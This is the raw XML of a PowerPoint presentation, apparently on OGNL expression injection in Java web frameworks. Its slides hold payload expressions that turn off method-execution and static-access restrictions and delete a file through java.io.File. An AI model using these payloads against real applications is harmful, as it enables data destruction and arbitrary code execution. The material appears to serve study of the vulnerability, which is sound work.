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107" r:id="rId2"/>
    <p:sldId id="1108" r:id="rId3"/>
  </p:sldIdLst>
  <p:sldSz cx="12196763" cy="6858000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2023/4/1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注入相关的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包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0B18C3-A6DA-A66C-4E22-700D38CF2199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238598" y="1386232"/>
            <a:ext cx="763284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%{#f=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>java.io.File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>("C:\\Users\\hp\\Desktop\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.txt"),#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>f.delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()}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C326F4-3BAB-3395-FF45-960BA6773FD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769789" y="772309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effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.io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EEC0F-9392-324A-4CE2-20E57F541510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752438" y="13862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Java.io.File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10DBF9-E350-CB48-56BE-C8DC3D31AA72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752438" y="209753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Java.io.FileDescriptor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65C5F-12C9-D2B0-533B-8EC509AB50C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253796" y="2127406"/>
            <a:ext cx="4068721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%{@Java.io.FileDescriptor@a()}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78B203-F7D3-0B81-5B44-2E448BADC184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752438" y="2883424"/>
            <a:ext cx="1745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sun.misc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3D5F7A-0AC6-B4D8-C35B-49965AD07E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718318" y="348464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sun.misc.Unsafe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E0148A9-7364-FB55-0100-8EA40CEC7EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711964" y="5317871"/>
            <a:ext cx="791388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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#a=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javax.persistence.EntityManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(){public void clear(){}}.clear()}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AC36A8-CB86-76F2-BEA1-6FAAD8982EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193725" y="5443926"/>
            <a:ext cx="350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javax.persistence.EntityManager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D3C467-0069-9DB5-99E7-BB5BF5003DA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553765" y="472346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  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javax.persistence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D55EA5-A55A-A76F-56D7-909CC0E0B950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238598" y="3366228"/>
            <a:ext cx="7913882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     #context["xwork.MethodAccessor.denyMethodExecution"]=false,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>@sun.misc.Unsafe@a()}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3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8EF99F0-E4A0-8F32-C294-A1F924C804C5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遇见的问题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权限语句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A7931-7CEA-4B73-BBA1-5C8B5E23BF1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805761" y="672371"/>
            <a:ext cx="684076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 #context["xwork.MethodAccessor.denyMethodExecution"]=false,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>@a@a()}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C83FA6-B023-BE29-37F3-0F9A044C1950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1707008" y="3244334"/>
            <a:ext cx="684076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 @a@a()}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F04CA01-C7A3-DB2E-7212-7B7834C6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57" y="1660965"/>
            <a:ext cx="7098263" cy="134291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B4F0028-0C82-1798-311F-B945F2E63F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694588" y="3933056"/>
            <a:ext cx="68407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%{#_memberAccess.allowStaticMethodAccess=true, #context["xwork.MethodAccessor.denyMethodExecution"]=false,}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35913-7505-B5DE-F75E-132E089F119F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1707008" y="4898777"/>
            <a:ext cx="684076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%{context["xwork.MethodAccessor.denyMethodExecution"]=false,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>@a@a()}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CB8898-D3BD-1DB9-ED82-A4CF6A81CA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9338741" y="324433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F753C3-5318-25E6-18A7-D7B5B4F7F30F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9344095" y="40715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313955-D037-260E-8F78-E8EA2D3F959E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9338741" y="504626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NORMAL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6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67"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition advTm="7567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自定义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 Math</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>1_默认设计模板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2023-04-01T10:50:21Z</dcterms:modified>
</cp:coreProperties>
</file>